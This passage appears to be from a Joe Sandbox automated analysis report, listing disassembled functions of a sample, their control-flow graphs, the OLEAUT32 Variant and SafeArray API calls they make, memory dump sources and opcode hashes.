                                                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6D02D5A6
                                                                                          • SafeArrayAccessData.OLEAUT32 ref: 6D02D5B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 1552365394-0
                                                                                          • Opcode ID: 3b7bacfdef7850bb2aa6e575f1e8b509a4a2043571d0b89b2ce4e8e498441031
                                                                                          • Instruction ID: 3e61124d5b03350da8fe70a1c2953224947a1dc8c3dafc69240c47563dd727d8
                                                                                          • Opcode Fuzzy Hash: 3b7bacfdef7850bb2aa6e575f1e8b509a4a2043571d0b89b2ce4e8e498441031
                                                                                          • Instruction Fuzzy Hash: 41B15476608341AFE714CF28C880B6BB7F9BFC9314F14895DE99987250E770E905CBA2
                                                                                          Function 6D02D468 Relevance: 21.2, APIs: 14, Instructions: 226COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1228 6d02d468 1229 6d02d470-6d02d4e0 VariantInit * 3 1228->1229 1231 6d02d4e2-6d02d4ea 1229->1231 1232 6d02d4ec-6d02d4f2 1229->1232 1233 6d02d4f6-6d02d504 1231->1233 1232->1233 1234 6d02d506-6d02d50d 1233->1234 1235 6d02d51e-6d02d527 1233->1235 1238 6d02d514-6d02d516 1234->1238 1239 6d02d50f-6d02d512 1234->1239 1236 6d02d538-6d02d53c 1235->1236 1237 6d02d529-6d02d530 1235->1237 1241 6d02d540-6d02d544 1236->1241 1237->1236 1240 6d02d532-6d02d536 1237->1240 1242 6d02d518-6d02d51c 1238->1242 1239->1242 1240->1241 1243 6d02d704-6d02d72f VariantClear * 3 1241->1243 1244 6d02d54a-6d02d5c0 call 6d069d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1241->1244 1242->1234 1242->1235 1246 6d02d731-6d02d757 1243->1246 1247 6d02d76c-6d02d783 1243->1247 1251 6d02d5c2-6d02d5c4 1244->1251 1252 6d02d5c6-6d02d5ea call 6d06a530 SafeArrayUnaccessData 1244->1252 1246->1229 1249 6d02d75d 1246->1249 1253 6d02d5ec-6d02d605 SafeArrayPutElement 1251->1253 1252->1253 1256 6d02d6e5-6d02d6eb 1253->1256 1257 6d02d60b-6d02d629 1253->1257 1258 6d02d6f6-6d02d6f8 1256->1258 1259 6d02d6ed-6d02d6f3 call 6d069d2c 1256->1259 1260 6d02d633-6d02d64f SafeArrayPutElement VariantClear 1257->1260 1261 6d02d62b-6d02d630 1257->1261 1264 6d02d701 1258->1264 1265 6d02d6fa-6d02d6fb SafeArrayDestroy 1258->1265 1259->1258 1260->1256 1263 6d02d655-6d02d664 1260->1263 1261->1260 1267 6d02d762-6d02d767 call 6d07c1e0 1263->1267 1268 6d02d66a-6d02d694 1263->1268 1264->1243 1265->1264 1267->1247 1280 6d02d697 call 137d149 1268->1280 1281 6d02d697 call 137d148 1268->1281 1270 6d02d699-6d02d69b 1270->1256 1271 6d02d69d-6d02d6a9 1270->1271 1271->1256 1272 6d02d6ab-6d02d6c1 call 6d01db30 1271->1272 1272->1256 1275 6d02d6c3-6d02d6e0 call 6d0256b0 call 6d026880 1272->1275 1275->1256 1280->1270 1281->1270
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4B3
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4C5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D4CC
                                                                                          • _malloc.LIBCMT ref: 6D02D551
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02D58B
                                                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6D02D5A6
                                                                                          • SafeArrayAccessData.OLEAUT32 ref: 6D02D5B8
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02D601
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02D63E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2723946344-0
                                                                                          • Opcode ID: 7be6e15b61e84c32c97463645b05b05421be59d702c26303e78b4668c136f4d3
                                                                                          • Instruction ID: 30683743680f3a3e497e705d205844a1194a745945464698bede0d7405f11ce5
                                                                                          • Opcode Fuzzy Hash: 7be6e15b61e84c32c97463645b05b05421be59d702c26303e78b4668c136f4d3
                                                                                          • Instruction Fuzzy Hash: 769135B56083019FE704CF28C880B6BB7F9BFC9304F15895DE9998B251E774E905CBA2
                                                                                          Function 6D0244C0 Relevance: 19.8, APIs: 13, Instructions: 261COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1282 6d0244c0-6d024538 VariantInit * 2 SafeArrayCreateVector 1283 6d024542-6d024564 SafeArrayPutElement VariantClear 1282->1283 1284 6d02453a-6d02453d 1282->1284 1285 6d02456a-6d024598 SafeArrayCreateVector SafeArrayPutElement 1283->1285 1286 6d02476f-6d024774 1283->1286 1284->1283 1285->1286 1289 6d02459e-6d0245b9 SafeArrayPutElement 1285->1289 1287 6d024776-6d024777 SafeArrayDestroy 1286->1287 1288 6d02477d-6d02479b VariantClear * 2 1286->1288 1287->1288 1290 6d0247b0-6d0247c4 1288->1290 1291 6d02479d-6d0247ad 1288->1291 1289->1286 1292 6d0245bf-6d0245d2 SafeArrayPutElement 1289->1292 1291->1290 1292->1286 1293 6d0245d8-6d0245e3 1292->1293 1294 6d0245e5-6d0245ea call 6d07c1e0 1293->1294 1295 6d0245ef-6d024604 1293->1295 1294->1295 1295->1286 1298 6d02460a-6d024615 1295->1298 1298->1286 1299 6d02461b-6d02469f 1298->1299 1306 6d0246a1-6d02471f 1299->1306 1312 6d024721-6d024758 1306->1312 1315 6d02475a call 6d06919e 1312->1315 1316 6d02475f-6d02476a call 6d02de60 1312->1316 1315->1316 1318 6d02476c 1316->1318 1318->1286
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0244FF
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024505
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D024516
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D024551
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02455A
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6D024579
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D024594
                                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6D0245B5
                                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6D0245CE
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D02475A
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D024777
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024787
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02478D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1304965753-0
                                                                                          • Opcode ID: ba47f0923348932bed04a66730a4e13597e30cea626f30e724bef09650b0cfdb
                                                                                          • Instruction ID: 2d6b7ed970e0bb04b620c7f6e365d5b0dba3ba481a0f1450b72ed4c092ce6a4e
                                                                                          • Opcode Fuzzy Hash: ba47f0923348932bed04a66730a4e13597e30cea626f30e724bef09650b0cfdb
                                                                                          • Instruction Fuzzy Hash: 37A13C75A01606ABDB14DFA4C984EAFB7B9FF8D710F14462DE506AB781C630E941CB60
                                                                                          Function 6D02BF00 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1320 6d02bf00-6d02bf6a VariantInit * 4 1321 6d02bf74-6d02bf86 1320->1321 1322 6d02bf6c-6d02bf71 1320->1322 1323 6d02bf90-6d02bfbb call 6d02c150 1321->1323 1324 6d02bf88-6d02bf8d 1321->1324 1322->1321 1327 6d02bfc1-6d02bfdf call 6d02c150 1323->1327 1328 6d02c0c4-6d02c0cd 1323->1328 1324->1323 1327->1328 1335 6d02bfe5-6d02c019 call 6d02dc40 1327->1335 1329 6d02c0e2-6d02c149 call 6d06a1f7 * 2 VariantClear * 4 call 6d06948b 1328->1329 1330 6d02c0cf-6d02c0df 1328->1330 1330->1329 1341 6d02c020-6d02c029 1335->1341 1342 6d02c01b-6d02c01e 1335->1342 1345 6d02c02b-6d02c02c 1341->1345 1346 6d02c02e 1341->1346 1344 6d02c035-6d02c037 call 6d0244c0 1342->1344 1349 6d02c03c-6d02c03e 1344->1349 1347 6d02c030-6d02c032 1345->1347 1346->1347 1347->1344 1349->1328 1351 6d02c044-6d02c05c VariantInit VariantCopy 1349->1351 1352 6d02c064-6d02c07a 1351->1352 1353 6d02c05e-6d02c05f call 6d07c1e0 1351->1353 1352->1328 1356 6d02c07c-6d02c094 VariantInit VariantCopy 1352->1356 1353->1352 1357 6d02c096-6d02c097 call 6d07c1e0 1356->1357 1358 6d02c09c-6d02c0af 1356->1358 1357->1358 1358->1328 1361 6d02c0b1-6d02c0c0 1358->1361 1361->1328
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Init$Clear$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3833040332-0
                                                                                          • Opcode ID: 47d73a1b311399539e70233a63227aae07d9f0a7fc7c31c7e96793b6eae88795
                                                                                          • Instruction ID: 0429a4880be8125bd939169d48fc710f29009104f944cd4537ade8b191f0c987
                                                                                          • Opcode Fuzzy Hash: 47d73a1b311399539e70233a63227aae07d9f0a7fc7c31c7e96793b6eae88795
                                                                                          • Instruction Fuzzy Hash: 12818C71901219AFEF04DFA8C884FEEBBB9FF49304F144159E905AB241DB75EA05CBA4
                                                                                          Function 6D0264D0 Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1362 6d0264d0-6d026552 VariantInit * 3 SafeArrayCreateVector 1363 6d026554-6d026559 1362->1363 1364 6d02655c-6d02657e SafeArrayPutElement VariantClear 1362->1364 1363->1364 1365 6d026661-6d026663 1364->1365 1366 6d026584-6d0265a1 1364->1366 1369 6d026665-6d026666 SafeArrayDestroy 1365->1369 1370 6d02666c-6d02669d VariantClear * 3 1365->1370 1367 6d0265a3-6d0265a6 1366->1367 1368 6d0265ab-6d0265c7 SafeArrayPutElement VariantClear 1366->1368 1367->1368 1368->1365 1371 6d0265cd-6d0265db 1368->1371 1369->1370 1372 6d0265e7-6d026613 1371->1372 1373 6d0265dd-6d0265e2 call 6d07c1e0 1371->1373 1385 6d026616 call 137d149 1372->1385 1386 6d026616 call 137d148 1372->1386 1373->1372 1375 6d026618-6d02661a 1375->1365 1376 6d02661c-6d026628 1375->1376 1376->1365 1377 6d02662a-6d02663c call 6d01db30 1376->1377 1377->1365 1380 6d02663e-6d026650 call 6d0256b0 call 6d026880 1377->1380 1384 6d026655-6d02665c 1380->1384 1384->1365 1385->1375 1386->1375
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D02650C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D026519
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D026520
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6D026531
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02656D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026576
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D0265B6
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0265BF
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026666
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026677
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02667E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026685
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 1625659656-0
                                                                                          • Opcode ID: 94e47bb969564fecb422059ebc63c01e1a448dc03aa4da2e71d710b575a4bdca
                                                                                          • Instruction ID: 9a21a572c681d2179d78ff800dae2624a8d2ff973ed605a720e92d68663617c3
                                                                                          • Opcode Fuzzy Hash: 94e47bb969564fecb422059ebc63c01e1a448dc03aa4da2e71d710b575a4bdca
                                                                                          • Instruction Fuzzy Hash: 98513772508305AFD700DF64C884A6BBBF9EFCA700F008A1DF95587250EB35E905CB92
                                                                                          Function 6D02CB90 Relevance: 18.1, APIs: 12, Instructions: 143COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1387 6d02cb90-6d02cc11 VariantInit * 2 SafeArrayCreateVector * 2 SafeArrayPutElement 1388 6d02cce7-6d02cce9 1387->1388 1389 6d02cc17-6d02cc4b SafeArrayPutElement VariantClear 1387->1389 1391 6d02ccf2-6d02cd18 VariantClear * 2 1388->1391 1392 6d02cceb-6d02ccec SafeArrayDestroy 1388->1392 1389->1388 1390 6d02cc51-6d02cc61 SafeArrayPutElement 1389->1390 1390->1388 1393 6d02cc67-6d02cc7b SafeArrayPutElement 1390->1393 1392->1391 1393->1388 1394 6d02cc7d-6d02cc8e 1393->1394 1395 6d02cc90-6d02cc95 call 6d07c1e0 1394->1395 1396 6d02cc9a-6d02ccc8 1394->1396 1395->1396 1401 6d02ccc9 call 137d149 1396->1401 1402 6d02ccc9 call 137d148 1396->1402 1398 6d02cccb-6d02cccd 1398->1388 1399 6d02cccf-6d02cce1 1398->1399 1399->1388 1400 6d02cce3 1399->1400 1400->1388 1401->1398 1402->1398
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CBCA
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CBD3
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02CBE4
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02CBF6
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02CC0D
                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D02CC39
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CC42
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D02CC5D
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D02CC77
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02CCEC
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CCFC
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CD02
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                                                                          • String ID:
                                                                                          • API String ID: 3548156019-0
                                                                                          • Opcode ID: 625c4d8e191e44ce236b07736b0815823d7695c3cf802167ef1eddc1ab3426ef
                                                                                          • Instruction ID: 4e26489b9fcbf31101595732dbeed62373d63ddf9d6309b83ffc99eaf7045581
                                                                                          • Opcode Fuzzy Hash: 625c4d8e191e44ce236b07736b0815823d7695c3cf802167ef1eddc1ab3426ef
                                                                                          • Instruction Fuzzy Hash: B25132B5D00249AFDB00DFA4C884EEEBBB9FF49714F10816AEA15A7341D771E905CBA4
                                                                                          Function 6D01A350 Relevance: 16.7, APIs: 11, Instructions: 206COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1403 6d01a350-6d01a3bd VariantInit * 3 call 6d0238e0 1406 6d01a3c3-6d01a3d6 1403->1406 1407 6d01a505-6d01a528 VariantClear * 3 1403->1407 1410 6d01a3e0-6d01a3f7 VariantCopy 1406->1410 1411 6d01a3d8-6d01a3dd 1406->1411 1408 6d01a532-6d01a546 1407->1408 1409 6d01a52a-6d01a52d 1407->1409 1409->1408 1412 6d01a3f9-6d01a3fa call 6d07c1e0 1410->1412 1413 6d01a3ff-6d01a411 VariantClear 1410->1413 1411->1410 1412->1413 1415 6d01a413-6d01a418 call 6d07c1e0 1413->1415 1416 6d01a41d-6d01a42b 1413->1416 1415->1416 1418 6d01a431-6d01a433 1416->1418 1419 6d01a42d-6d01a42f 1416->1419 1420 6d01a436-6d01a43a 1418->1420 1419->1420 1421 6d01a440 1420->1421 1422 6d01a43c-6d01a43e 1420->1422 1423 6d01a442-6d01a477 1421->1423 1422->1423 1439 6d01a47a call 137d149 1423->1439 1440 6d01a47a call 137d148 1423->1440 1424 6d01a47c-6d01a47e 1424->1407 1425 6d01a484-6d01a493 1424->1425 1426 6d01a495-6d01a49a call 6d07c1e0 1425->1426 1427 6d01a49f-6d01a4b0 1425->1427 1426->1427 1429 6d01a4b2-6d01a4b4 1427->1429 1430 6d01a4b6-6d01a4b8 1427->1430 1431 6d01a4bb-6d01a4bf 1429->1431 1430->1431 1432 6d01a4c1-6d01a4c3 1431->1432 1433 6d01a4c5 1431->1433 1434 6d01a4c7-6d01a503 1432->1434 1433->1434 1434->1407 1436 6d01a549-6d01a578 VariantClear * 3 1434->1436 1437 6d01a582-6d01a596 1436->1437 1438 6d01a57a-6d01a57f 1436->1438 1438->1437 1439->1424 1440->1424
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$Init$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3214764494-0
                                                                                          • Opcode ID: c8aa8ca603ddbcbebd21f49550ad8778620104364df3595971650dbe79e3f6d3
                                                                                          • Instruction ID: 34948b5fc2f1001c4c8e0e11822f02116697f270096b14868fe15c830f67351b
                                                                                          • Opcode Fuzzy Hash: c8aa8ca603ddbcbebd21f49550ad8778620104364df3595971650dbe79e3f6d3
                                                                                          • Instruction Fuzzy Hash: 4C7137726083419FE700DFA9C880F5AB7E8BF89714F10895DFA55CB291D731E905CB62
                                                                                          Function 6D0249B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1495 6d0249b0-6d024a26 VariantInit * 3 SafeArrayCreateVector 1496 6d024a30-6d024a4d SafeArrayPutElement VariantClear 1495->1496 1497 6d024a28-6d024a2b 1495->1497 1498 6d024a53-6d024a5e 1496->1498 1499 6d024b5e 1496->1499 1497->1496 1501 6d024a60-6d024a65 call 6d07c1e0 1498->1501 1502 6d024a6a-6d024a7c 1498->1502 1500 6d024b61-6d024b63 1499->1500 1503 6d024b65-6d024b66 SafeArrayDestroy 1500->1503 1504 6d024b6c-6d024b97 VariantClear * 3 1500->1504 1501->1502 1502->1499 1507 6d024a82-6d024a8e 1502->1507 1503->1504 1507->1499 1508 6d024a94-6d024ae1 1507->1508 1512 6d024ae3-6d024ae8 call 6d07c1e0 1508->1512 1513 6d024aed-6d024b1c 1508->1513 1512->1513 1513->1499 1516 6d024b1e-6d024b29 1513->1516 1516->1499 1517 6d024b2b-6d024b3b call 6d01db30 1516->1517 1517->1499 1520 6d024b3d-6d024b4d call 6d0256b0 call 6d026880 1517->1520 1524 6d024b52-6d024b5c 1520->1524 1524->1500
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(6D0805A8), ref: 6D0249EE
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0249F7
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0249FD
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D024A08
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D024A39
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024A45
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D024B66
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024B76
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024B7C
